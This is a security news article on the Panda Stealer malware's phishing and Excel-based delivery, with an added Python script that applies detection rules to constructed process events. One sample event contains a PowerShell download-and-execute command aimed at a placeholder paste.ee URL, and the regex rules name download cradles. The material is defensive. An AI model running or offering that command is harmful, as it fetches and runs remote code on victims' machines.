Panda Stealer Spread Through Discord via Excel Files to Steal Cryptocurrency and VPN Credentials

A new cryptocurrency stealer variant is being spread through a global spam campaign and potentially through Discord channels. 

Trend Micro researchers, who dubbed the malware Panda Stealer, said this week that it has been found targeting individuals in countries including the US, Australia, Japan, and Germany. 


The malware begins its infection chain through phishing emails, and samples uploaded to VirusTotal also indicate that victims have been downloading executables from malicious websites via Discord links. 


Panda Stealer's phishing emails pretend to be business quote requests. So far, two delivery methods have been linked to the campaign. The first uses attached .XLSM documents that require victims to enable malicious macros.


If macros are permitted, a loader then downloads and executes the main stealer. 


In the second chain, an attached .XLS file contains an Excel formula that hides a PowerShell command. That command reaches out to a paste.ee URL, pulls a PowerShell script onto the victim's system, and the script in turn retrieves a fileless payload. 


"The CallByName export function in Visual Basic is used to call the load of a .NET assembly within memory from a paste.ee URL," Trend Micro says. "The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL."
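The two delivery chains and the MSBuild.exe hollowing described above leave a recognisable trail in process-creation telemetry. The following Python script is an added example, not code from the article or from Trend Micro, that runs three simple detection rules over constructed Sysmon-style process-creation records: an Office application spawning a scripting host, PowerShell reaching a paste site or using a download-and-execute cradle, and MSBuild.exe launched by a non-build parent with no project file on its command line. The sample records, the paste.ee path in them and the additional paste-site hostnames beyond paste.ee are assumptions made for this example.

```python
"""Process-creation heuristics for the Panda Stealer delivery chains.

Added example; the events below are constructed for illustration and are
not telemetry from the Trend Micro report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    """Minimal Sysmon Event ID 1 style record (parent image, image, command line)."""
    parent_image: str
    image: str
    command_line: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
BUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe"}

# paste.ee is the staging host named in the report; the other two hosts are
# an assumption added here to broaden the check.
PASTE_HOSTS = re.compile(r"(?i)\b(paste\.ee|pastebin\.com|hastebin\.com)\b")
# Common PowerShell download-and-execute primitives and encoded commands.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|"
    r"Net\.WebClient|Invoke-Expression|\biex\b|-enc(odedcommand)?\b)")
# Legitimate MSBuild invocations normally name a project or solution file.
PROJECT_FILE = re.compile(r"(?i)\.(proj|csproj|vbproj|sln|targets)\b")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(ev: ProcEvent) -> List[str]:
    """Return the names of the rules this event trips (empty list if none)."""
    hits: List[str] = []
    parent, child, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line

    # Rule 1: Office spawning a scripting host is the macro / Excel-formula
    # execution pattern used by both .XLSM and .XLS chains.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("office-spawns-shell")

    # Rule 2: PowerShell pulling a script from a paste site or using a
    # download cradle (the .XLS chain fetches its script from paste.ee).
    if child in {"powershell.exe", "pwsh.exe"}:
        if PASTE_HOSTS.search(cmd):
            hits.append("powershell-paste-site")
        if DOWNLOAD_CRADLE.search(cmd):
            hits.append("powershell-download-cradle")

    # Rule 3: MSBuild.exe started by a non-build parent with no project file
    # is consistent with its use as a process-hollowing target.
    if child == "msbuild.exe" and parent not in BUILD_PARENTS \
            and not PROJECT_FILE.search(cmd):
        hits.append("msbuild-no-project")
    return hits


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map the index of every suspicious event to the rules it tripped."""
    return {i: hits for i, ev in enumerate(events) if (hits := analyze(ev))}


# Constructed sample events (the paste.ee path is a placeholder).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "IEX (New-Object Net.WebClient)'
              ".DownloadString('https://paste.ee/r/example')\""),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"),
    ProcEvent(r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              "MSBuild.exe App.csproj /t:Build"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

Rule 1 on its own is noisy in environments where Excel legitimately spawns cmd.exe for add-ins, so in practice it is best weighted together with rule 2; rule 3 is low-volume on workstations that never build software and is the cleaner signal of the hollowing stage.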

Once downloaded, Panda Stealer will attempt to detect keys and addresses associated with cryptocurrency wallets holding funds including Ethereum (ETH), Litecoin (LTC), Bytecoin (BCN), and Dash (DASH). In addition, the malware is able to take screenshots, exfiltrate system data, and steal information including browser cookies and crede ..
